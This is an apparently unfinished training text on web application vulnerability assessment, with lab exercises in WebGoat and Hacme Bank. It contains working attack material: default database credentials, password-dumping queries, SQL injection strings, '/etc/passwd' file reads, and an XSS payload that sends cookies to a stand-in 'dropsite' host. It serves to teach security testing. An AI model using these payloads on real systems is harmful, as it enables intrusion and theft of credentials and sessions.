Practical Web Application Vulnerability Assessment

Foreword

This text started out as PowerPoint slides to facilitate lecture led training, but is now being transformed to become a text book for both classroom style and self study learning.

Copyright

This work is Copyright © 2005, 2006, 2007 Michael Boman. This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License


Web Vulnerability Assessment Methodologies

Risk, Threats and Vulnerabilities

Before we start we should clarify what we mean with Threats and Vulnerabilities. No area can exist as a profession unless it has clearly defined its basic concepts.

Threat is an party with the intent and capability to exploit an vulnerability in an asset. This could be an malicious hacker or an disgruntled employee.

An vulnerability is weakness in an asset that can be exploited. For an example, the security hole in Microsoft WMF (Windows Meta File) format is an vulnerability.

Risk is the probability of harmful consequences resulting from interactions between threats and vulnerable assets. Conventionally risk is expressed by the relation

Risk = Severity x Likelihood

  • Severity: If asset or control gets compromised, what kind of information or access does the attacker get? Grabbing banners or list directories are rated less severe then for an example gaining administrative access to the system.
  • Likelihood: How likely is it that this will happen? For an vulnerability, how easy is it to find and exploit? A published exploit or a worm using this vulnerability to spread increases the likelihood of this happening compared to a vulnerability which is hard to exploit and requires a lot of insider information. In short: How skilled must the threat be to exploit the asset?

Profiling the Platform

  • Port Scanning and Service Identification
  • Vulnerability Scanning

When you do security assessment of a website you should start with profiling the server. By knowing what the server is running you can better target your attacks. It will also cover any low-hanging fruit a malicious attacker might exploit.

Profiling the Application

  • Enumerate the Directory Structure and Files
  • Identify Authentication Mechanism
  • Identify Authorization Mechanism
  • Identify All “Support” Files
  • Identify All Include Files
  • Enumerate All Forms
  • Enumerate All GET Parameters
  • Identify Vectors for Directory Attacks
  • Identify Areas that Provide File Upload Capability
  • Identify Errors
  • Determine Which Pages Require SSL

Web Application Assessment Tools

  • Web Browser
  • Man-in-the-middle HTTP / HTTPS proxy
  • Enumeration and fuzzer software
  • Encoders / Decoders

For any web application assessment you would need a few tools. You would need a web browser to interact with the application in question, a man-in-the-middle intercepting http/https proxy, various enumeration and fuzzer software and optionally, but very likely, some software to help you encode/decode various encodings.

Fuzz testing or fuzzing is a software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example, by crashing, or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior. Fuzz testing was developed at the University of Wisconsin-Madison in 1989 by Professor Barton Miller and the students in his graduate Advanced Operating Systems class.

A Word About Web Browsers

If your browser is not supported you might miss functionality in the application due to incompatible browser optimizations or functionality. You don't want to end up in an situation where a particular usability bug manifests itself using an "unsupported" browser and you have to re-validate the bug using a "supported" browser. Having said that, there has been occasions where a unsupported browser has uncovered bugs in the targeted application.

Man-in-the-middle HTTP / HTTP proxy

One can argue that the most important and useful tool to have in your web application kit is the intercepting man-in-the-middle proxy. This piece of software allows you to inspect and modify and data sent to or received from the web application. This will allow you for an example send requests that would not have passed any browser based verification.

We will mainly use Paros Proxy as the man-in-the-middle proxy.

Enumeration and fuzzer software

Encoders / Decoders

Exercise : HTTP Basics

  1. Go to “General → Http Basics” in WebGoat
  2. Follow the on-screen instructions

Web Application Attacks

  • Generic Input Validation
  • Character Encoding
  • Alternate Request Methods
  • SQL Injection
  • Cross-Site Scripting

Generic Input Validation

Exercise : Input Validation

Hidden fields modification

  1. Go to “Unvalidated Parameters → Hidden Field Tampering”
  2. Follow the on-screen instructions

Unchecked email

  1. Go to “Unvalidated Parameters → Unchecked Email”
  2. Follow the on-screen instructions

Source Disclosure

One could expect that today's developers

Exercise : Source Code Hints

  1. Go to “Code Quality → HTML Clues” in WebGoat
  2. Follow the on-screen instructions


Character Encoding

URL Encoding (Escaped Characters)

  • Alphanumeric
    • a-z A-Z 0-9
  • Reserved
    •  ; / ? : @ & = + $ ,
  • Marks
    • - _ . ! ~ * ' ( )
  • Space
    • 0x20 (ASCII hexadecimal value)
  • Delimiters
    • < > # % "
  • Unwise
    • { } | \ ^ [ ] `
  • Unicode

Exercise : Character Encoding

Alternate Request Methods

  • OPTIONS
  • BROWSE
  • CONNECT
  • COPY
  • DELETE
  • HEAD
  • LOCK
  • MKCOL

SQL Injection

  • SELECT Statement Manipulation
  • Retrieve Arbitrary Data with SELECT plus UNION
  • Use INSERT to Modify Data
  • Salient Information for Common Databases

Server Default Accounts View Users Useful Variables

Microsoft SQL Server

sa / <blank> EXEC master..sp_who2; EXEC master..xp_loginconfig; SELECT * FROM sysusers; SELECT * FROM syslogins; EXEC xp_msver; @@servername @@version

MySQL

root / <blank> SELECT host,user,password FROM user; SHOW VARIABLES; @@version

Oracle

internal / oracle oracle / oracle Scott / tiger sys / Change_on_install system / manager others* SELECT A.USERNAME, A.PASSWORD FROM SYS.DBA_USERS A; SHOW PARAMETERS

PostgreSQL

postgres / <locked> (must be defined) SELECT * FROM pg_shadow; SELECT * FROM pg_group;

Common SQL Injection Strings

Raw String URL Encoded Version Effect ‘ %27 Initial test. If this generates an error, then the application is vulnerable to SQL injection. % %% %25 %25%25 Represents a wild card. Can be used to retrieve multiple rows as opposed to a single value. ‘;--

--

%27%3b%2d%2d %3b%2d%2d SQL comment. Use this to truncate a statement so that further SQL syntax within the statement is ignored.

Database Specific Notes

Microsoft SQL Server

The easiest method to identify a potentially vulnerable application that uses an MSSQL back-end is to insert a single quote (‘) into URL parameters (or any/all input boxes). Examine the output, HTML source, or even the URL parameters for a tell-tale sign.

Oracle

Oracle supports comments delimited by the double-dash as well as C-style syntax. SELECT * FROM table /* this comment is ignored */ WHERE foo = ‘bar’; For database enumeration: SQL> show user; USER is "SYS"

MySQL

Comments in MySQL: Double-dash (- -) requires space (%20) immediately after hash (#) C-style comments (/* comment */). Read from the File System mysql> CREATE TABLE foo (bar TEXT); mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE foo; mysql> SELECT * FROM foo; SELECT * FROM employees INTO OUTFILE ‘/tmp/foo’; https://website/vuln.cgi?param=%27;+SELECT+%2a+FROM+employees+INTO+OUTFILE+%27%2ftmp%2f..%08%27;

PostgreSQL

Does NOT:

  • Support file input
  • Support file output
  • Support UNION
  • Have the immediate command execution vulnerabilities for a database like Microsoft SQL Server.

BUT File Read/Write Access is still available using COPY statement

Putting It Together

  • Identify a vulnerable parameter.
  • Examine errors for indicators of a SQL injection.
  • Examine errors for information on database, table, and column names.
  • Query standard variables for the type of database.
  • Determine system-specific users.
  • Determine database-specific users.
  • Determine application-specific users.
  • Query standard database objects
  • Record available databases, tables, columns, and known row values.
  • Query arbitrary data from application tables.
  • Use OR TRUE=TRUE commands to bypass authentication.
  • Insert arbitrary data into standard database tables.
  • Insert arbitrary data into application tables.
  • Attempt to read and write files on the operating system.
  • Execute arbitrary commands on the database’s host operating system
  • Send files to an FTP, HTTP, TFTP server or netcat listener.
  • Write files to the web document root.
  • Overwrite important configuration files.
  • Denial of service

Exercise : SQL Injection

Numeric SQL Injection

  1. Go to “Injection Flaws → Numeric SQL Injection” in WebGoat
  2. Follow the on-screen instructions

Blind SQL Injection

  1. Go to “Injection Flaws → Blind SQL Injection” in WebGoat
  2. Follow the on-screen instructions

String SQL Injection

  1. Go to “Injection Flaws → String SQL Injection”
  2. Follow the on-screen instructions

Cross Site Scripting

Testing for Cross Site Scripting

<script>alert(‘Hello world!’)</script>
<script>alert(‘document.cookie’)</script>
<script>document.location='http://dropsite/cookiemonster.cgi?'+document.cookie</script>

Filtering for '<' and '>' on input is not enough, can easily be bypassed with encoding

%3cscript%3ealert(document%2ecookie)%3cscript%3e

Other script languages

  • VBScript
  • Java
  • ActiveX
  • Flash

Exercise : Cross Site Scripting

Stored XSS

  1. Go to “Cross-Site Scripting (XSS) → Stored XSS” in WebGoat
  2. Follow the on-screen instructions

Reflected XSS

  1. Go to “Cross-Site Scripting (XSS) → Reflected XSS” in WebGoat
  2. Follow the on-screen instructions

Token Analysis

Encoded vs. Encrypted

There is a big difference between encoded and encrypted data. Encoded data, using for an example [wikipedia:Base64|Base64], is always reversible and only provides obfuscation and not confidentiality or protect it against tempering.

Pattern Analysis

Session Attacks

Session Correlation

Exercise : Session Analysis

  1. Go to “Broken Authentication and Session Management → Predictable Session Identifier” in WebGoat
  2. Follow the on-screen instructions

Security Assessment of Web Services

Now days it becomes more and more common that at least part of the sites functionality is available as a web service. To perform a complete vulnerability assessment of the target web application you will need to cover any and all web services as well.

What are Web Services?

What is a web service? Although there is no universal definition of a web service, I think the Apple developer connection has defined it pretty well:

"The term web services refer to architecture, standards, technology and business models that provide an implementation-independent way for applications to communicate with each other".

Web services perform functions, which can be anything from simple requests to complicated business processes. It allows you to mash up your flickr photos with Google earth using geo tagging.

WSDL Scanning

WSDL scanning refers to an adversary enumerating interfaces, data types, binding information and address information using publicly available WSDL files

WSDL Scanning using Google

Google can find public WSDL over the Internet Signatures filetype:wsdl amazon index of "/wsdl“ inurl:wsdl amazon

WSDL Scanning using wsChess

  • Free .NET tool developed by NetSquare, Inc
  • http://net-square.com/wsChess/
  • Comprised of
    • wsPawn - Web services foot printing, discovery and search tools.
    • wsKnight - Web services profiling, proxy and audit tool.
    • wsRook - This is a regular expression-based defense for web services input content.

WSDL Scanning using WSDigger

  • Free .NET tool by Foundstone.
  • Functionality include
    • Helps search for WSDL in public / private UDDI
    • Open source framework for WS attacks
  • Current checks include SQL / XSS / XPATH injections. Trivial to add other checks

Parameter Enumeration

  • Enumeration refers to systematically checking system interface for simplistic attacks
  • Parameter tampering refers to sending malicious quality and quantity of data to method parameters

Parameter Enumeration using WSDigger

Coercive Parsing – Jumbo Payload

XML is verbose in a way it marks data and information Gigabyte files norms in multimedia world Overtly large documents can cause denial of service attacks Parsers based on DOM specially susceptible

Coercive Parsing – Recursive payload

XML allows nesting ELEMENTS within documents Malicious document 100K level deep might stress out / DOS the parser

Coercive Parsing – Replay attack

Similar to web application replay attacks or network ping of death attack

Send repeated valid SOAP messages

Drains web services XML parser and results in denial of service

External References - External Entity

XML can build documents dynamically by pointing to external data URI External URI can contain malicious data

External References - Routing Detours

SOAP by itself does not define routing path. It is generally embedded in another application layer protocol (HTTP) WS-Routing extends SOAP with addressing structure to define complete message path Extended SOAP message is self contained, does not have to be bound to any application layer protocol and can be sent over TCP

Routing Detours Attacks occur when interim web service station are compromised, resulting in malicious routes Vulnerabilities Insert bogus routes Get access to sensitive information Deny service by routing to non-existing destination External References - Routing Detours External References - Schema Poisoning Schema provides formatting instructions for XML parsers interpreting XML documents. It often use external data types by including references to external schema / name space Schema poisoning requires schema to be compromised and replaced with a new one This leads to easy DOS and other data manipulation attacks Malicious Content – Attachment Binary attachments like executables, images can be transferred with valid XML Valid attachments like excel sheets can contain malicious macros Viruses / Trojan horses Attachment can be attached or referenced

Malicious Content – Attachment

SOAPBox Demo

Malicious Content – SQL injection

Similar to SQL injection in web applications. Inject SQL queries / commands as part of SOAP message

Malicious Content – XPATH injection

XPATH language helps find information in the XML document

Sample XPATH Expressions

/Books/*/Nodes 
/Books/Book/@Pages
/Books/Book[./Publisher = "lulu"]
/Books/Book[./Pages > 100]

XPATH Injections

/Books/Book[./Pages > 100 or 1=1]

Automated XPATH injection

Exercise : Attacking Web Services

SOAP Request

  1. Go to “Web Services → Soap Request” in WebGoat
  2. Follow the on-screen instructions

WSDL Scanning

  1. Go to “Web Services → WSDL Scanning” in WebGoat
  2. Follow the on-screen instructions

Web Service SQL Injection

  1. Go to “Web Services → Web Service SQL Injection” in WebGoat
  2. Follow the on-screen instructions

Appendix A : Challenges

Challenge 1 : Web Goat Challenge

  1. Go to “Challenge → Start Challenge” in WebGoat
  2. Follow the on-screen instructions

Challenge 2 : Hacme Bank #1

  1. Go to “Hacme Bank” page
  2. Bypass the login screen
  3. Create your own credentials in the database

Challenge 3 : Hacme Bank #2

  1. Go to “Hacme Bank” page
  2. Login with the account created in challenge #2
  3. Perform the following:
    1. Horizontal Privilege Escalation
    2. Vertical Privilege Escalation

Challenge 4 : Hacme Bank #3

  1. Go to “Hacme Bank” page
  2. Login with the account created in challenge #2
  3. Exploit the Cross Site Scripting Vulnerability

Challenge 5 : Hacme Bank #4

  1. Go to “Hacme Bank” page
  2. Login with the account created in challenge #2
  3. Perform the following:
    1. Steal $100 from bank account # 5204 3204 2204 0004

Challenge 6 : Hacme Bank #5

  1. Go to “Hacme Bank” page
  2. Login with the account created in challenge #2
  3. Perform the following using cookie manipulation
    1. Enable a Brute Force Attack
    2. Privilege Escalation

Challenge 7 : Hacme Bank #6

  1. Go to “Hacme Bank” page
  2. Login with the account created in challenge #2.1
  3. Bypass the Admin Section Login challenge / response

Challenge 8 : Hacme Bank #7

  1. Go to “Hacme Bank” page
  2. Perform the following:
    1. Enumerate Web Services available in Hacme Bank
    2. Exploit the Web Services available in Hacme Bank

Challenge 9 : Hacme Books

  1. Go to “Hacme Books” page
  2. Exploit and document all the vulnerabilities you can find